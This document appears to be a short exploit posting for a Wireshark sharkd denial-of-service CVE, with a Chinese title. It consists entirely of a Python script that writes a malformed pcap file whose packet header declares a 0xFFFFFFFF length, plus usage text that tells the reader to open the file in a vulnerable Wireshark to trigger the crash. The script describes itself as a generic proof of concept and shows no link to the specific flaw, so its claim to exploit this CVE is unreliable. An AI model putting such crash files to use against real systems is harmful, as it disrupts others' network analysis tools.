CVE-2026-7378 Wireshark sharkd拒绝服务漏洞

import struct def generate_malformed_pcap(filename): # Generate a malformed pcap file header to trigger potential parsing crash # Global Header: Magic Number (4 bytes), Version (2 bytes), ... magic_number = 0xa1b2c3d4 version_major = 2 version_minor = 4 thiszone = 0 sigfigs = 0 snaplen = 65535 network = 1 # Ethernet # Intentionally corrupting the header or packet data to cause crash # This is a generic PoC structure for a crash vulnerability with open(filename, 'wb') as f: # Write standard header f.write(struct.pack('<IHHIIII', magic_number, version_major, version_minor, thiszone, sigfigs, snaplen, network)) # Write a packet header with invalid length to trigger buffer over-read or overflow ts_sec = 1234567890 ts_usec = 0 incl_len = 0xFFFFFFFF # Extremely large packet length orig_len = 0xFFFFFFFF f.write(struct.pack('<IIII', ts_sec, ts_usec, incl_len, orig_len)) # Write dummy packet data (incomplete) f.write(b'\x00' * 100) print(f"[+] Malformed pcap file generated: {filename}") print("[+] Usage: Open this file with Wireshark/sharkd vulnerable version to trigger DoS.") if __name__ == "__main__": generate_malformed_pcap("crash_dos.pcap")